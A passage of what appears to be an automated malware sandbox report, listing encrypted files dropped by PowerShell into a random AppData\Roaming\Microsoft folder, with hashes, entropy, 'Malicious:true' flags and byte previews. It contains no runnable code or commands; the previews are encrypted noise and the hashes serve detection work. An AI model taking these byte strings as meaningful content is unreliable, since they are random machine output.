                                                                                                    SSDEEP:3072:fyWk86KVWcWReCTBRF5ydtYIFs4XkHSGIHcyvEABs:K+657VBb5IWIFpXkHSPhvEAW
                                                                                                    MD5:86D3147FD883F833D36B79A0C2A6D3D3
                                                                                                    SHA1:EEAD10A063E52CE09EC3E227D60D5FB3575F1671
                                                                                                    SHA-256:ADAEBD281AB36714847EFF62653701C2CAD62E0212BCF639B1C0083CB0ABBAC1
                                                                                                    SHA-512:A141CD12C6CA593E30202D983047BEF5775D088E90DCB964334A4E9590CEF2BF6532D54ED7740578315233BF1890D90A661138ADE11976844286460917F9950C
                                                                                                    Malicious:true
                                                                                                    Preview: .t.D|q... +.%...m.rO.b.~.\....(@~.2...j.h..|Q.M.G....i@..5... ..2V..Cs!..K..,...%..D.2..=5'...y.ac.t..x.Q.....g.Bg#.6.6.[T...a>Be..........`.'..X..:>D....w.%.p.N.....vgB<5..H3..h....!1.H...%.Uj.U.........#....+....Jx.*9......P......1.....7...6.*.."..I.....E..*+.gA_.{...2"..|....E~?*....b~.V......b..D....W..h.6.P(..(..O....w%..F.I9.n...u.5\.$.........*.^k....'....DI..._p.z.k...{T.+s.R..f.w............R...d..0...T)..s.5....&.aN....y....5A.Jxj......7`.4.......X.5".)@S.k..N*n%...N../D.H....>kD vP..JtN..l#i......;....'.S..\j...G,.x.Q.........h:J..."..<...;.q.W.^.fx~.}........y.Gm.V4W......>..5.....A..m..F.uf.@.......<._.TO...,..L,..f....-=...>,....s.x.........2A$.L..1.pP.f#..%...R....Q|.L./.......A...:GL...rd0..RXI..P.1#F..m\.3...j....U.......tvi......'......PmX.Zg..lH...S..r....x.-...0..[.......$t%.....FQ.9g.Qm.,..X;P.:n..m....i.c...Omf.e.`x.>._.0..L..9.e....Gw.N.....n...G/...M..~.L...........B.0...0+....].~....Z..b(.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kaReSLHMDNCjd.BmpjaJXZLy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):70709
                                                                                                    Entropy (8bit):7.997574071746185
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:SuZy5KIixmkSmaiL2B0tghHS89I0O9R4YppFuQHUmQ9CJfq1y:Smy5KI11maiLv+YVp6CYy
                                                                                                    MD5:5B3DB57018DD941ED42A7E08A7F4506F
                                                                                                    SHA1:8AD231CDBC364C50AB87FE029D6660F81C39E1E5
                                                                                                    SHA-256:106447F094C1D970D654F7ECAC6C7E8430982E75F3D254AFC170DEBC3149E2B9
                                                                                                    SHA-512:DE308FFC1BBF2C69036F4DB7025002FF5070CF1BD8167A528E4F6F8694A5478D79CAB67D2E28716225270DCC78072365956D1096F3DB761B61EE5761CD91E17B
                                                                                                    Malicious:true
                                                                                                    Preview: .."DR].;.....l*. lKWv......g...K`.T(`....q)l>PQ.. .v..*yU/.x!El..Y...A..e^.....X...z...\)....m.,.g.........?..Z.iPeHd.r.I.S7........XJ.\{...TB........^b.:...........W....~n...{.....HpJ..pQl.....x....p4..G.];.|.).....*Z...C.lMn.M}...h...(f......e.....x...s1.t..)..3V.)....R..n..D.)}...}...Qx/....M.Y.....%.k..E.k^p......W.^...4~r.....g&jWA.P.2z.Gu..."c*...yQ...!...;._ML.9,W|d..k..oM|.;...@..X...8H7..$......k..m:....\.......3..6X-....]Q...]U.-...y.^%.hA..q)..7.....>)..WT}...!.....P...+...%si....zI4d><.........a.2B............d...<...G.f....J...8.5D.t.32.S.O$"..wp;..y1/......Qn.._;cV..X5Q.Ixh...[Y..~.uDS:..$.G.o..E. ig..'d......x.r.......M...g..V.I;.....]9"....Oo\...|....oU.~.AoN.=..&........6..T[...Tz..L2.).Pu\.F.6m..T..x...d..I...a-.....;....fu.R:..c....Y..<,j..0..cH.'Rl........VPt)o......\.V]5l...7.;..69.9..z..SA..z.PP.QR..2[.....C..8.%N..>...z..n..9.H...wPS....,.LA.*..g.../?o.dy..+.........<...AB.w.f.y.x.7._[B....QA.4|.!_.H=P.D...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kcmRWjHfYhGSDI.WaZwpSVMbLvF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):173838
                                                                                                    Entropy (8bit):7.998985429355532
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:XEIqS92yBJbMADCyA+ryLGuybBXvNaOuS5ZxdVWah5Rf2wxjWr:UIr2yBRMKC/+mau+B/NaOuS1dEaJ2wk
                                                                                                    MD5:8FF65E1467CFC7A021F25B36BF17894A
                                                                                                    SHA1:CED9DF01905E9DADC71C7602B5E29A454314B7A8
                                                                                                    SHA-256:C94D602A2C3BE88FFC0DDE7B4E378CE28F6E79A0BAECCAD3E7262482316D1119
                                                                                                    SHA-512:1094D93FF9CFB8AFC1B17C3DF0B307445C2B15CD4984FA8EFC3A24B9D78513A57B49EFBE96C0584ADFB8FA769EB4CCF0C4EE4092A1042539A47B8F7C7B4BBEF9
                                                                                                    Malicious:true
                                                                                                    Preview: .3...r.-........2K%..3$.u..........-A..fw...k.....{.|..."...........].P.t.../.tW....IV..D.(....Y.4$...l-+..L<...aV.O..Og).....X.{%.....].iaNc.P.B.r......)..j......Y.........u.a.....4.....E.k.........e.....&.u.t...w.G...y...Nx...X..!,e.0..$..f...`..[ty.r*...^....L..\..rIcg.....v...x.C....3n.pRH.J.......+.q.tX.....7...Z......C.:.._......../7...v....H..u<.!].{......~.PJ.ZwJ.....'R.Zl..8.'$..N./[..0.............!-.f.TF.)%.H)X....m...d....g2b....H*..M..$.C.M.+.c)s....E....V-r..t.EV..j.r....K..]s.(H..J...'....wW....oWy.....v.*M..k'...f..K..........3...-A..(../....{..i.<&Z..+b^..{......~........-6....].O./^"..%...o.....W.S.8]...V...P1o.O.....$..b.r..5k..W....IJ..P...oT......3K*JX..cvr....}.Fo.....C.....p......@C.U.c..4.-...;7.,9.]H..#6.i.?G}...b........nN..X..1_G.'.m.*X......MbJ.dw!..~u.c.@..)sA..N..e..../8C.CE(..%..v.....!<y..ep.....e..E. ...c.AM.h{V..V....,o2.JY...1x..^...z.L7.).....^..*.`..+A..l?x..(....?~mE5...wKY.#...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\keRWjtrHXhgfBuEpo.ChNHBsvquoKmgEf
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):146716
                                                                                                    Entropy (8bit):7.998693511460092
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:v3ThEqIeiuUnNN95lTaZHq1/7ff3DY1Xx+0eR8xS:vBIE2EK1/7jY1hYRj
                                                                                                    MD5:A5B0E4F386DC5D8DC539CE1F45D66F40
                                                                                                    SHA1:8BCF98505E67C91B0FA455A02E74DD34C3778A0E
                                                                                                    SHA-256:7A80A2BC71193254930AD2721B95D2DCC54DB26273C1FDA98E12E0F7023BD883
                                                                                                    SHA-512:861F18B4D563956C679D37521814DD653759D871E805EE4AD57C00D139BC35FD3CD8AEFC13250856EA72649AE75B908434750F0DE22C6B0DABD1AEF458FFB49E
                                                                                                    Malicious:true
                                                                                                    Preview: ...mIb......v.^.d..!..h.3..s6..\.C......MUkQ..%.}......./.P.[.....g...u..B....S...4_^e.>f..pct7..tpo......2.XM..!c@~.....j..zU.l.R........K.D..{..Y....-...T..a..:6..........~.:.d.jv'...M.L....d..ED...7........S..j....R.;C..fh...U[~>o..,L).)....F..qU..Q|k.....R.Ew+`..l..n../l!.`6.....o.v...pz..>..!..........Y..x.=nf.0..@L.=..<.k.$.X..I....].P..w.0.-.H.l...A..Sv.PA9..5...E...e..Q...XpW.bIS...4....X.......Q..7^.....H..GVl.....`..x.8..K.R.nn....S.3..n..d0..`?#.H.g....o.....Z..u......Hu_....JP..f.26..+r....C{)...{+S^.S.................u.U.8.SD......y....lEBwr.M....9@.J.g...H...........i;./X..s.DK.5c.(.%.u....g~.j.K^.~.....`.i.?..=....s...L..~..Z.\?.`!k..\t..y~..)......a~$WNR......-."..)..s..."x..h..g.q..o+.">ZO.~l.....h..{Q..4.......]5............s.b...mBy.8n..T..a...g.M..c..F~5!.S(.........n.l).T......{..3x.L.@,^.YT..RBk...%u{).?.Gqmz.5.P.a.!.C?.../#.t....-.OQ....._...Tq..m..-..$...y..^"*....I....y.H......+!...k.-...K1F..X(R`...r..Fh..k
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kemKqGFByCbYziINd.PmYSHMGxVyuiF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):144330
                                                                                                    Entropy (8bit):7.998878778178118
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:lVWAKwc4z0G00O17NpWdnsm52Tx1/fcWd8CcTwkCaXTVq0+4ecI:lVWAZO/17NURsNL3cM8KNaDVq0A
                                                                                                    MD5:C23D7C837AD0E44A5615D61EEA332488
                                                                                                    SHA1:6F8D12ACBD92A97F52C1AAD9F576BD6F53441CD6
                                                                                                    SHA-256:FCDBC4AFA210FFE768717E829737DCF5EC3F0AA271C9EA242925055745838C9A
                                                                                                    SHA-512:AC40E8E78FB3D385ED15A747D1A39AD8FC5189A9B370E7DC378641786758C7375C2AE6E428415C017B35A2ACACA839B0C60E0BD1C479B672B51596E8E5AF3A97
                                                                                                    Malicious:true
                                                                                                    Preview: |......f|A-+T.j..Y.}[................ec......yG.. *W......#F...*D...<=6.a.7F8..n..y..+w...A.4.+....p....<&..}.........f_.d...,!.I.g......laL....%DJ<A.....b%.>...33....1..[..|I.....]Zv..K...-g..O..'jt..`..gDK.`1......_......-b.Nm:..A.6...2S.O..y.1.|..pY0..2..t.7..Q..)E.4l.A..d.T...gK..@[v...p..\.uj.7].......j`..e&8.3....G........PA.'.G."DZ.v.. .}.Vn...g.UU...:.X.jh..m.6dAt'4......lq2ut.?.J......@}m.8..[@}...WwO..........`.TD......~.kf.....FI....iz....t.A*...g...q..I*4.....$.u.6tN...I)<.....d.a...Pg.._VI.v.....'..^......,.H......m......n.=....8!.bR.S\)nL....,..).....'}DA..Xz.M....].V..I&...pg..V$pu:...-:....f.Ia.U..@........ h(..H.u(N{wv..".&..>..Q58+.X..%....V..}8.,;....}Y...g.....{...U|.1Z.%..".^.l.OC.*b:..5........ML..y..3b[../.vbj8[W1.}8.a2.3..$(.`.....-..../.Y..Tv2.k... ..w.jx.WX.of).C.JZ....j_..@.O...[..9+S7P..5..<*t..!T..t[3...8.........."H..o.KD..?Y|.2j....9..Y.z.V2...H*26"..]...l@.?.........1t......,Z.Ro.G..Gd...";.....l.....K..N@..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\krqIJEOnjTWS.rDWMREvyASFjXIa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:little endian ispell hash file (?), and 7937 string characters
                                                                                                    Category:dropped
                                                                                                    Size (bytes):178905
                                                                                                    Entropy (8bit):7.998948593194168
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:Tt9ikY8LGsVkxKVgiYjO3sULX9DGHjTo6VJzRzxFQm0gVDrs1E:Tt4kdasVXVgiY4s2cgyFzxFh21E
                                                                                                    MD5:A5BC4A8021A8330AD10F7DD909E7D855
                                                                                                    SHA1:98011EA917D66ED87A2753CE13FD04A6A0339D66
                                                                                                    SHA-256:60EA28AFBB611B2AE0E0EDD2A7CD04EE4FA4901F97898334127E85E2698B1542
                                                                                                    SHA-512:A9AD0374A64970DE50DFA7AD4DE7D0BA810B242A1488B06054BFB2DA09937F3230C8E6DF23EE31FE61ED5EDB1C78A9138A5CED7F26DD2ACF791A959790128FF0
                                                                                                    Malicious:true
                                                                                                    Preview: ...6..........K?..`...L.rY."j..FWa..1r.:..Q.....k].1.v..L....~..X.......Sv<..\.Q....{.+.l...j..z.4m 3.P...m...j.~.v.C.....0.................S..A...-..'...Z{....tXz<`eiF....F,f....j.X&:.N.$.T..%xq....M....S....Tj@..T....!....!...ro....I..0..<.w~.qq....,.K".1...U49...>..h....uj<%.[..t......!.|=.Er.3../.G.9.f..z.ou.-+..J..6.{.7....'.Q.,..FF..Fb-....q..4T.....u.......f..~......`N..%.A.>.h..c!....O........$... ..X.O..X..2...\..?.E.N.Y..........r......<...!....1J].9..^..$....#.?.s.vx.[....w5...ls.i.t.Ou..bz.k....[..W...D...HG#.J.<.F..'...DL;._...1...;z.0.?.Ea>h.....G.=...Y..i...\m.....P.........a.4'....K..&.cl.<..i...`.,..e....8.YY-.X.....{w...Rt.)s.$a...B.Eo<.3d.nO2..0k[>]B.c..4.N..v.n7k.C....$.=..@.I.'..-tso... Hlu.?.....;y.#&.....%..M...1...V..8....W.RV.m.PLa....#..e..!...t.B.^..aV./K9.....sVc..i......e.V.X:m....z.l.....|l.p..Q.X0a.A.....:..5.~I(.9#.|.C.q...V..Th?x8......FhP&.Z......].2.#.."..?...>...~H*....../...._UZ..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lCBidQIwcZav.zNnsXvMAfcB
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):177820
                                                                                                    Entropy (8bit):7.99900450167475
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:1y4AGO4RExc2P7+oF1Yf9Clxge5HKdLemHBuUNH0Iqehw1nU3ifI96:pAGO4REx7z+oFSf98xZHVwEUF9K1nM0x
                                                                                                    MD5:24F826499D0171AE9826887B5382DDE2
                                                                                                    SHA1:B0BC48873B92DF7139DCA5FF80893DE37D3EB039
                                                                                                    SHA-256:0454BE56F9AA23A7A78E6E7F7E21F166288EF349621A33873B87523816D06481
                                                                                                    SHA-512:748445760757128B950D91403EC203604D618DAD1910F52D2D99D3AA30A78038AFB7845195942C24340CEB54558179B23AF35E0A53ECEF50F32B848B2C4DFA37
                                                                                                    Malicious:true
                                                                                                    Preview: .*.6|....0...R..J..c"Z....[..W.....Y.-..2..8_.q..-.8..UQm.J.K...o[.....1Hj......)..V...;;.[....P.(D.../o......!..]...'.H|....d~.....b}b.F.....m...Y.&C&...y)=....u..BL~Q+..B....B..#...K.S\Y.Iz..}.g[{..U$...)9..w....v..+...g...W..j;;....7o.cr.~\...i.c...,*..}.x....D ....C.._f.k......s..Jo./.7.e..z....&..s.$.A...Sa#..+...9.Q.....-..N.b.C.%..."..A}.N.(....3..*.H..cs.a.,..MWmP...d$..d.\.O.....@%C.qv..flx......r.#......Tp?{.<.1)....|<...?...n.E..{...T.7&...d|1 .........L..:.+..&.....E..).".-..T.Pu.\........=..v4..a.f..q}.V.<.{.Q.."|,.*.F|.`.m..a.g..u.\..+['*E{.......Wa^..f.bDg.[..:.....5.QX...?.X.dM...?I..... .......!C.z8xf.#.......#....=;...1.6....z,.}H..E..=..(+.'.a.....}.tG.T..{.|e12...g.......Ky..G..q....>D8.....=w.|..".A.E...W..h3i.R.[)....@;.Ht<0..[N.G.m..6..8.J.._gSO.^...*R8.'.R...@.e.#k-...Y..Q.|wpY..F.CR^op.U../...y.,.0.i..T.tVt.7~*q.S.2...3Aqp..r...D...tq....qzXj.+...g.t.',`....r3.jq..84.........X03..(Kb.G.v....Fe...1.h^..._
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lCPVwzOuUaBZm.eXJWGlrmvw
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):93683
                                                                                                    Entropy (8bit):7.997881988651579
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:V6QxglkaxHg4DzCzKx4m9y6c683V2dXkcSNWcyBC0Kw5AL3PsaDweN:0PgwCt9678FaX/4WcyBCgAL3/N
                                                                                                    MD5:373E3E87BCFF8A1172B811C1E10F8A9F
                                                                                                    SHA1:56A7543017FB8687CF142C27EF35B6C3B6DDC47D
                                                                                                    SHA-256:55AD9FF574C07F76F87F7E8DFDB94594AD4829D3668EE769D0788DDEFFAB9911
                                                                                                    SHA-512:7F0F42A96F5E8B2BF0524B514E600A1FE2591E6F340A6AABF85AA8DB85E8D9A4268931D0CCACB22693C144A2E671BFF43AAED3E16BBE8898E8B331AEE04E85F9
                                                                                                    Malicious:true
                                                                                                    Preview: .W..@._l.]...}.A....L:."...x.D.3].%.~j....M.x..b).._V......sgwS.. ..wg5.*hh.;.w.N......?a.D..l.....G.kiS4..s9...d....R{7.{W....\..#N..<..#....[...LM.g`.ze...;..2.B.{.p.$./t............"BN...~a~B=.. I..g0W.L...#..#....Y{!.."....f....v.).+/.\...b[C.......D.C.w4..-.4.M.o.)....h..2../.......E~(E.......#(.H..i..<....&%...\...........0......_.uU..&~V....q^.0.AY.....=H...k...$...nu3*LqzG*...R..v..E.PUfn#...L.........../W.?M<...^.. .)_}.........T..2V6...m...........W?.&S..rQ.>..6....../?.".'....$...g....<........_.'H'...~q.\~@t....b..{....[T...OV..NW.X.E....h{.i....S...h..*..@....^..y..[.t.t..4.T.R.C.:c..0.o}......<O..9..?>....../.y...u+.....H.h...G...Q.H.cv.j.(slR.ke.$.._..Q.."..x'?.../qF...6f.....}..D$..H...*....o.(AB."l;...P..o^...............n...;............ABe.%.O...Y.........L8Y.:.....1.D.b.+.....^...8...8&E.-`.r1.......de....g..PD'....V.YN....g.A.....e...(*NV..d.-.".6.s.B.a.......gj>.8.1.,......^.... .p".,...B..{.O.F.%..G...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lCzNubFOAJTw.SRuJjOGKVDmLo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):117475
                                                                                                    Entropy (8bit):7.998425725779343
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:QFRxSH0tt9arVB4Ap1PCCxQCdgaKrEvpUYPn8OTLgCT9Aso026OXX0hMxZ6d4URW:WRsaTarVMCuCqaVvS2TD9Aso/dHkddKZ
                                                                                                    MD5:03DB265CC00CA015D392FE70222FC48E
                                                                                                    SHA1:366DC00DF20C0883E4CCEA8456D10BA3182D5392
                                                                                                    SHA-256:00584CC3AAF91AA21C824978526822ED286CC4DE9C39FF9D8E14E8534752B8B9
                                                                                                    SHA-512:A267B0DD7F9D535D9FF1033B165DB68A4A1E5B009F7D1971CA7BC5E4AC59E59E9B78C5D8326657751ADEDC8A919FB676D161FA785A6705EC8837B046FA572B1B
                                                                                                    Malicious:true
                                                                                                    Preview: a.vK..7......3h)...v.......lXXC..P.vMn.# .....a.f4..|..6...q.pY]..Q.u".;Rr..H.V....;..]..j...~r..."#CcD.....`...}J"....^..r..O`.y.Fs....).q.i..=..'....8.r....z.B[DgB.+.G....p4.HN8..q+;.#9$2..s.k$.nb1.p.K.<...+.NB.i..,l.d....o.K;]....<%....7...1..:.B..$h..`.b..1..,.,f.-...&W...\..Tru.K...#8.U...wW..{.....\.C........N...I.].......a..mr....|....6.(u3.2K.n....z.....x4H......@...'..p...F..q.L.....S;...bt@.fzIb-.zk.r...1PDT.....#3............C..}73..M..._...x%...l..WHd.e.....u..x6G6&.O.....Sur..e.J.R.....Y.....R.F....O.-.@1f.o.G'&.^...f.a3...yXB.....e)co...aU...w.$. 7.;..Rjx...P:..p.5B4&.m..j.$A.d.||u.yI...A....w(t.\..m...;>8:E7....%...10..T...*..;...s>.M..H..1... ...=..6.eDJ....\.;9...bZq.e.A.:......l.<W...).6.m}..h.W.:u....^...l...(.`"Z.G..-.8.".V.1.1.....-M.>m.{.....R..]F...L<.a......<[..............U.._..C...A...XXe..zVAr.=.S....k.7.....JS.f-.k^AP...Z..%.t4...H#G.A.M7./.l..>P.I8to8..H5{.x.........S.#*._..5..M......P?....a...8....QD
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lIxrMbusnHJcBoC.xQYIbOmaVzGljUAtpi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):116623
                                                                                                    Entropy (8bit):7.998554487182719
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:d7sjQnZM2egxtpk/ZNSkYn580boETHtDpscbDFiW:RsjQni2DFk/TSkYnLoMtFlbpiW
                                                                                                    MD5:D1CAD420EC2DE5F1E94F7951280BC92D
                                                                                                    SHA1:025BF8485DF4BC987AEF2D19483FEFE77D90D208
                                                                                                    SHA-256:6C1B4F18664D0E2605827F1C4BE98B5E8023112B2BC2B3CD44C72E2014814404
                                                                                                    SHA-512:E2550E8AF4589B0B478952EB0F307254CBCA2D926AD344DB4A8CF4CB5DDDCC244A998AF8D75B64D8B0290827CA64B95173E2982AED58F46C47C5AB5F7BFD505C
                                                                                                    Malicious:true
                                                                                                    Preview: {M.....:TC.&.....\.{..2v..\5.L.C...m.21.av..I...DC.J....-....L^.A....}.*..:^...u.4../.. (..Cg......8.....p<vx. T..V.Ip.c..H..,%F....Qw.d...V#..{.&Y.3..<n...P2...G8..m...<4%.....q)&...TY}.c.t....@.P.IE.......>..."...6J..L@...)..0>..<E.....$.b..........l.......:X.....h=.(...,[2....&.C.A..P|(..'v..A..L.....`.Ti1.k.....v......=...=...t!g**..X.Ed..a....w..X(."....`....I.W......P..`..s/.a.q......A]......r.6o;.......1.q?.:..0>,.mf.%._...RM.{oy*.4....,..|......B../6..5.........-.2c..9..R}..].U...J..j.6{.M..3.uv......1.w..C6p...v.Q.[-....f.J........U....E..e..`..%.i.....V.mi#\>...!.2.;.A.........%..#K.....].......-..49. ..b.d....1i......C..F_..Y.U`G.....UM.s........... 8..[='q....Q..b.Z.D..x.;.PF^S.K'.......h.i....&kI..'.}-..v!..n.6*..Y.i.h. pf...[ ...{......q..v\....w.g&...~..e.de.*..}.y..d......R|*.....cq....4..c\.Ptf...+4...B.;9[.Q..h....a....V....XZBr.=..........H...]..........3t.M..0+.!.....*%....4gpZ/.?E..Y ........;...0..y.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lZnrDvVxOWKwa.CtrIMSdDyULzsJFV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):191664
                                                                                                    Entropy (8bit):7.999059641625179
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:d7sjQnZM2egxtpk/ZNSkYn580boETHtDpscbDFitU56aF12mmM9t5SRbv1NSi:RsjQni2DFk/TSkYnLoMtFlbpiO5TQRbn
                                                                                                    MD5:33F6E6996CE575C01A89DE5A75980969
                                                                                                    SHA1:533A4752BC91FD32AEF03FA53860F213FC6FAC93
                                                                                                    SHA-256:820DBD73B9247271AFE7069673B87A5CB53E7C8630E04CF925FC2F534D431E99
                                                                                                    SHA-512:70C3BC6B459A6F69FBAE4505586AD06D1D99C53DFC9113E2758956394CCC102791CC7C3750DC62C97CA302C2BEC41800B19ED4F469670DDE0A1397959E2DF5CD
                                                                                                    Malicious:true
                                                                                                    Preview: {M.....:TC.&.....\.{..2v..\5.L.C...m.21.av..I...DC.J....-....L^.A....}.*..:^...u.4../.. (..Cg......8.....p<vx. T..V.Ip.c..H..,%F....Qw.d...V#..{.&Y.3..<n...P2...G8..m...<4%.....q)&...TY}.c.t....@.P.IE.......>..."...6J..L@...)..0>..<E.....$.b..........l.......:X.....h=.(...,[2....&.C.A..P|(..'v..A..L.....`.Ti1.k.....v......=...=...t!g**..X.Ed..a....w..X(."....`....I.W......P..`..s/.a.q......A]......r.6o;.......1.q?.:..0>,.mf.%._...RM.{oy*.4....,..|......B../6..5.........-.2c..9..R}..].U...J..j.6{.M..3.uv......1.w..C6p...v.Q.[-....f.J........U....E..e..`..%.i.....V.mi#\>...!.2.;.A.........%..#K.....].......-..49. ..b.d....1i......C..F_..Y.U`G.....UM.s........... 8..[='q....Q..b.Z.D..x.;.PF^S.K'.......h.i....&kI..'.}-..v!..n.6*..Y.i.h. pf...[ ...{......q..v\....w.g&...~..e.de.*..}.y..d......R|*.....cq....4..c\.Ptf...+4...B.;9[.Q..h....a....V....XZBr.=..........H...]..........3t.M..0+.!.....*%....4gpZ/.?E..Y ........;...0..y.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lsZtIjvPLeTFONEYoR.QlrbLyCigOvGY
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):164743
                                                                                                    Entropy (8bit):7.999127351438595
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xc4OFOViK9TEAKWOR+pZkwX1GohxkOb0Fijy5P0jwRlPzFNi82cjAnmw:xsKhEQ/ko1zhy9ijUqk1zbi8hAnd
                                                                                                    MD5:49C12FAE435EBD3CA3449497B6D89B0D
                                                                                                    SHA1:C4B8E0CD746866FC16D6146A8C0E3E72A4D92122
                                                                                                    SHA-256:D702E409D3BB66710379BAC04769069CF5DB4EEEC723BE25D0F86E2215356291
                                                                                                    SHA-512:695A456098B8F455AD6C10418B57B69B5DA2E2B159C8C4C1DEFDA215BCF739138066E5131C14173E5F4EB09942E54F17CAB252F7623FF1AEF6BE067DC42C232B
                                                                                                    Malicious:true
                                                                                                    Preview: y.B.f....kf...D#.&.G...%.i:bv..!..S.Lbn..t....!.....6xjus.`t...fI.hB.2.6.....4.0.E...6".../W.0kt.u.wV.]3.........!g.2 .%..m.%B.......N..R....[J...QWc]7,.z..y......8.......Fa...5.P^Ev.......b.....VpY.LF..I...D.{.=..4[.%.jN.=.......*u........aO...!.m8d..4....e.......|v.L...FqeJ@...aW.....a....m.....}...W..4..|.........x.)..4}....@.Bg.>-...T....%....$....W.G....x.@a`a.j.^}...cj..1.k..Z.!...;..w.L..~4VF.%0...&.....e.....N..)....Z..l.W.])T..YJ....fsn......4s...Y.,[.jr....7~..A$.u50....1.....".t.P.[.H........w.|...AXk..e......7.#..-..=.../..&.m...G...T....W.$..mSGucoW..i.k.i.z((.o.q9.uf.di..5p..?.-.ABaI..2K.]/.........e.,j`6..";/....J'..B.V.:".....16?..4.+..oy"..[.v.a......HH.O.2...rQ..I..&...9@.Q.V4.?....B..).`F..'...`q..D1....8...9.&.....ZI..1.{G...._.[.T..+.E.H.N.B..@.*....;..:HY.w.J'r...M...9..i..n.`.j...........CA....XL....1.Y3..2..BH.....>U./n..(q.z...m_.............K.........)1..pd.+.....1cV.y.\..g..8l...Y..Y.H.R..,.D...i.P..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\luqQJXdPpGHef.fxQuzBylFe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57161
                                                                                                    Entropy (8bit):7.9968369561145085
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:NVwDRO933NQHF39OYbLHdXbEsDSiy6BFNWURoSn/KKv6z9:NOEmF8Ybr1bEsWiy+WUoSN6z9
                                                                                                    MD5:DADBEC891E7A1085A0DD0F14DD48E831
                                                                                                    SHA1:56055E6105741C99B141230F8EC778C37D296C95
                                                                                                    SHA-256:9B88443D31C990588D83EBF9B2CF4A3F3578B48FAF8C4CA54FFBF5097BCF11B4
                                                                                                    SHA-512:FADD4302C68E1BCA3BC85B7F093620BEF9D49B357410D1B5995AE5C180B6547B5E6B33B04805F2E893EE5CA81BAEB4A53ADD111B5748A93B6A2724863DEBBED8
                                                                                                    Malicious:true
                                                                                                    Preview: P.6..X.fV....A........:.J.=.......,.n.Hu.....F.x.{C.p..mm..KR...Ji.?X...).}x...<..i...N..B..Lj{....8..9.G.~....i..~.....?..c........Z!..$>.|.T....T........9.;.*R..^y.~...x4.4....U6..X.a....E.....#Rg..d~(%..i>g{.....e......U.T.F...J.!#f0....:.(.8.mU..[...To.#...?...5._..2?...h.d.Ad....].....x|o..>t....)b.9..{..w]...$..A1.jds..8N.&g.n'....#.(b..T....lR.Z.w.....t...s..[.o.K.]...q..#.A...J..r.0..np.7..-...g......T....v...E.q.....c... ..N..a.....s....?.._:.#.b2%t.....8X...r..R........m.@... ....&.|..8Z.!c....F.9.14Q.......Cw..w.s..][V.k...C5v.K........|..."...:....}.rKof..,Q..P...\.....c5XV..o1.l.u.X."..5.=....#.....X^.....z...c...0.....W`CQ..|E.t..q.[H...du...p......?...H.iLX.y..|...r...p._%.;.".^.]j.q...6..f.3r....t.}....".-.6u..MO.........,..G.~j.D...R{.n.8w..z%..J.]...s.8rol..1smg.R].y.......-...]E?u.....".....=V.l..6..e2..c.$......,7UNw...4U....G.I.A.1.G..jb....K*..?....1.......|...X.O...<..Jy.M.../@.}`...0.....lR.../p...S(..cG..3..<....D
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mFzrGopuJQNOTdk.IgYKySZhpwTmWclqVeb
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
